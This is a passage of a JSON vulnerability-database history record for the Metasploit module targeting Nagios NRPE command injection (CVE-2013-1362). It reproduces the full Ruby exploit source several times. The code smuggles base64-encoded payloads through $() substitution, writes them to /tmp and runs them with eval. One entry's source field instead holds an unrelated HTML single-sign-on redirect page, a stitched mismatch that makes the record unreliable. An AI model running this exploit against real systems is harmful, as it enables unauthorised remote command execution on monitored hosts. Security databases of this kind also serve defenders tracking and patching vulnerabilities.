accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-12T00:35:40", "differentElements": ["sourceData"], "edition": 97}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "7af0909609ddf9c8e970b9a830af05bd", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.\n", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1362", "http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability"], "cvelist": ["CVE-2013-1362"], "lastseen": "2019-06-17T02:14:14", "history": [], "viewCount": 125, "enchantments": {"score": {"value": 8.4, "vector": "NONE", "modified": "2019-06-17T02:14:14"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1362"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:120507", "PACKETSTORM:121287"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2013:0624-1", "SUSE-SU-2013:1219-1", "OPENSUSE-SU-2013:0621-1"]}, {"type": "openvas", "idList": ["OPENVAS:865802", "OPENVAS:1361412562310120026", "OPENVAS:1361412562310850460", "OPENVAS:865756", "OPENVAS:1361412562310850457", "OPENVAS:1361412562310865756", "OPENVAS:850460", "OPENVAS:1361412562310865802", "OPENVAS:850457", "OPENVAS:1361412562310121262"]}, {"type": "nessus", "idList": ["FEDORA_2013-9829.NASL", "FEDORA_2013-9848.NASL", "ALA_ALAS-2013-203.NASL", "NAGIOS_NRPE_2_14.NASL", "SUSE_11_NAGIOS-NRPE-130710.NASL", "OPENSUSE-2013-301.NASL", "FEDORA_2013-9836.NASL", "GENTOO_GLSA-201408-18.NASL"]}, {"type": "amazon", "idList": ["ALAS-2013-203"]}, {"type": "zdt", "idList": ["1337DAY-ID-20645"]}, {"type": "exploitdb", "idList": ["EDB-ID:24955"]}, {"type": "saint", "idList": ["SAINT:21BB3E24EB9AE6BD8636B7F5A2A455A3", "SAINT:191B282062BFEBFDC0EBFA60A2FDED78", "SAINT:E0F846270087DB671556237BDF17DDDE"]}, {"type": "gentoo", "idList": ["GLSA-201408-18"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12910"]}], "modified": "2019-06-17T02:14:14"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-17T02:14:14", "differentElements": ["sourceData"], "edition": 98}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "b8fd29a158b5b91d5ab7a065082cbc04", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.\n", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1362", "http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability"], "cvelist": ["CVE-2013-1362"], "lastseen": "2019-06-17T14:38:11", "history": [], "viewCount": 126, "enchantments": {"score": {"value": 8.7, "vector": "NONE", "modified": "2019-06-17T14:38:11"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1362"]}, {"type": "nessus", "idList": ["FEDORA_2013-9829.NASL", "FEDORA_2013-9848.NASL", "ALA_ALAS-2013-203.NASL", "NAGIOS_NRPE_2_14.NASL", "SUSE_11_NAGIOS-NRPE-130710.NASL", "OPENSUSE-2013-301.NASL", "FEDORA_2013-9836.NASL", "GENTOO_GLSA-201408-18.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310850460", "OPENVAS:1361412562310120026", "OPENVAS:865802", "OPENVAS:865756", "OPENVAS:1361412562310850457", "OPENVAS:1361412562310865756", "OPENVAS:850460", "OPENVAS:1361412562310865802", "OPENVAS:850457", "OPENVAS:1361412562310121262"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:120507", "PACKETSTORM:121287"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2013:0624-1", "SUSE-SU-2013:1219-1", "OPENSUSE-SU-2013:0621-1"]}, {"type": "exploitdb", "idList": ["EDB-ID:24955"]}, {"type": "zdt", "idList": ["1337DAY-ID-20645"]}, {"type": "amazon", "idList": ["ALAS-2013-203"]}, {"type": "saint", "idList": ["SAINT:21BB3E24EB9AE6BD8636B7F5A2A455A3", "SAINT:191B282062BFEBFDC0EBFA60A2FDED78", "SAINT:E0F846270087DB671556237BDF17DDDE"]}, {"type": "gentoo", "idList": ["GLSA-201408-18"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12910"]}], "modified": "2019-06-17T14:38:11"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-17T14:38:11", "differentElements": ["modified", "published", "sourceData"], "edition": 99}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "5a1933538a73a517997e3192eb3293dd", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1362", "http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability"], "cvelist": ["CVE-2013-1362"], "lastseen": "2019-06-21T04:27:58", "history": [], "viewCount": 126, "enchantments": {"score": {"value": 8.7, "vector": "NONE", "modified": "2019-06-17T14:38:11"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1362"]}, {"type": "nessus", "idList": ["FEDORA_2013-9829.NASL", "FEDORA_2013-9848.NASL", "ALA_ALAS-2013-203.NASL", "NAGIOS_NRPE_2_14.NASL", "SUSE_11_NAGIOS-NRPE-130710.NASL", "OPENSUSE-2013-301.NASL", "FEDORA_2013-9836.NASL", "GENTOO_GLSA-201408-18.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310850460", "OPENVAS:1361412562310120026", "OPENVAS:865802", "OPENVAS:865756", "OPENVAS:1361412562310850457", "OPENVAS:1361412562310865756", "OPENVAS:850460", "OPENVAS:1361412562310865802", "OPENVAS:850457", "OPENVAS:1361412562310121262"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:120507", "PACKETSTORM:121287"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2013:0624-1", "SUSE-SU-2013:1219-1", "OPENSUSE-SU-2013:0621-1"]}, {"type": "exploitdb", "idList": ["EDB-ID:24955"]}, {"type": "zdt", "idList": ["1337DAY-ID-20645"]}, {"type": "amazon", "idList": ["ALAS-2013-203"]}, {"type": "saint", "idList": ["SAINT:21BB3E24EB9AE6BD8636B7F5A2A455A3", "SAINT:191B282062BFEBFDC0EBFA60A2FDED78", "SAINT:E0F846270087DB671556237BDF17DDDE"]}, {"type": "gentoo", "idList": ["GLSA-201408-18"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12910"]}], "modified": "2019-06-17T14:38:11"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">\n<html>\n\t<head>\n\t\t<title>sso login check</title>\n\t\t\n\t\t<meta charset=\"utf-8\"/>\n\t\t<meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\" />\n\t\t<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" />\n\t\t<meta http-equiv=\"CACHE-CONTROL\" content=\"NO-CACHE\" />\n\t\t<meta http-equiv=\"PRAGMA\" content=\"NO-CACHE\" />\n\t\t<meta http-equiv=\"EXPIRES\" content=\"0\" />\n\t</head>\n \t<body>\n \t<script src=\"http://127.0.0.1:12381/auth\" language=\"javascript\" type=\"text/javascript\"></script> \n\t\t<script language=\"javascript\" type=\"text/javascript\">\n\t\t\tfunction getOrigURLParamValue() \n\t\t\t{\n\t\t\t\tvar orig_url_param = 'orig_url=';\n\t\t\t\tvar decodedUrlParameters = decodeURIComponent(location.search);\n\t\t\t\tvar decodedOrigParam = (new RegExp(orig_url_param + '.*').exec(decodedUrlParameters)||[,\"\"])[0].replace(orig_url_param, '').replace(/\\+/g, '%20')||null;\n\t\t\t\tvar encodedOrigParam = encodeURIComponent(decodedOrigParam);\n\n\t\t\t\t//console.log('Decoded URL Params: ' + decodedUrlParameters);\n\t\t\t\t//console.log('decodedOrigParam: ' + decodedOrigParam);\n\t\t\t\t//console.log('encodedOrigParam: ' + encodedOrigParam);\n\n\t\t\t\treturn encodedOrigParam;\n\n\t\t\t}\n\n\t\t\tfunction empty(str)\n\t\t\t{\t\n\t\t\t\treturn !str || !/[^\\s]+/.test(str);\n\t\t\t}\n\t\t\t\n\t\t\tvar encodedOrigUrl = getOrigURLParamValue();\n\t\t\t\n\t\t\ttry\n\t\t\t{\n\t\t\t\tif(typeof(gCtchLogonInfo) !== 'undefined')\n\t\t\t\t{\t \t\n\t\t\t\t\tvar modified_redirect_url = \"https://\" + window.location.hostname +'/EUP/transparent_login/?orig_url=' + encodedOrigUrl + '&winUserId=' +gCtchLogonInfo.winUserId ;\n\t\t\t\t\tif (!empty(gCtchLogonInfo.orgName))\n\t\t\t\t\t{\n\t\t\t\t\t\tmodified_redirect_url = modified_redirect_url.concat(\"&orgName=\",gCtchLogonInfo.orgName);\n\t\t\t\t\t}\n\t\t\t\t\tif (!empty(gCtchLogonInfo.userName))\n\t\t\t\t\t{\n\t\t\t\t\t\tmodified_redirect_url = modified_redirect_url.concat(\"&userName=\",gCtchLogonInfo.userName);\n\t\t\t\t\t}\n\t\t\t\t\t\n\t\t\t\t\tdocument.location.href = modified_redirect_url;\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\tdocument.location.href = \"https://\" + window.location.hostname + '/EUP/login?orig_url=' + encodedOrigUrl;\n\t\t\t\t}\n\t\t\t}\n\t\t\tcatch(e)\n\t\t\t{\n\t\t\t\tdocument.location.href = \"https://\" + window.location.hostname + '/EUP/login?orig_url='+ encodedOrigUrl;\n\t\t\t}\n\t\t</script> \n\n\t</body> \n</html>\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-21T04:27:58", "differentElements": ["modified", "published", "sourceData"], "edition": 100}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "b8fd29a158b5b91d5ab7a065082cbc04", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.\n", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1362", "http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability"], "cvelist": ["CVE-2013-1362"], "lastseen": "2019-06-21T06:31:02", "history": [], "viewCount": 127, "enchantments": {"score": {"value": 8.7, "vector": "NONE", "modified": "2019-06-21T06:31:02"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1362"]}, {"type": "nessus", "idList": ["FEDORA_2013-9829.NASL", "FEDORA_2013-9848.NASL", "ALA_ALAS-2013-203.NASL", "NAGIOS_NRPE_2_14.NASL", "OPENSUSE-2013-301.NASL", "FEDORA_2013-9836.NASL", "SUSE_11_NAGIOS-NRPE-130710.NASL", "GENTOO_GLSA-201408-18.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:865802", "OPENVAS:1361412562310120026", "OPENVAS:1361412562310850460", "OPENVAS:865756", "OPENVAS:1361412562310850457", "OPENVAS:850460", "OPENVAS:850457", "OPENVAS:1361412562310865756", "OPENVAS:1361412562310865802", "OPENVAS:1361412562310121262"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2013:0624-1", "SUSE-SU-2013:1219-1", "OPENSUSE-SU-2013:0621-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:120507", "PACKETSTORM:121287"]}, {"type": "amazon", "idList": ["ALAS-2013-203"]}, {"type": "zdt", "idList": ["1337DAY-ID-20645"]}, {"type": "exploitdb", "idList": ["EDB-ID:24955"]}, {"type": "saint", "idList": ["SAINT:21BB3E24EB9AE6BD8636B7F5A2A455A3", "SAINT:191B282062BFEBFDC0EBFA60A2FDED78", "SAINT:E0F846270087DB671556237BDF17DDDE"]}, {"type": "gentoo", "idList": ["GLSA-201408-18"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12910"]}], "modified": "2019-06-21T06:31:02"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-21T06:31:02", "differentElements": ["sourceData"], "edition": 101}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "0a76f78c502c6c4ab078a51c1ec264f4", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.\n", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1362", "http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability"], "cvelist": ["CVE-2013-1362"], "lastseen": "2019-07-14T18:24:19", "history": [], "viewCount": 127, "enchantments": {"score": {"value": 8.2, "vector": "NONE", "modified": "2019-07-14T18:24:19"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1362"]}, {"type": "openvas", "idList": ["OPENVAS:865802", "OPENVAS:1361412562310850460", "OPENVAS:1361412562310120026", "OPENVAS:865756", "OPENVAS:1361412562310850457", "OPENVAS:1361412562310865802", "OPENVAS:850460", 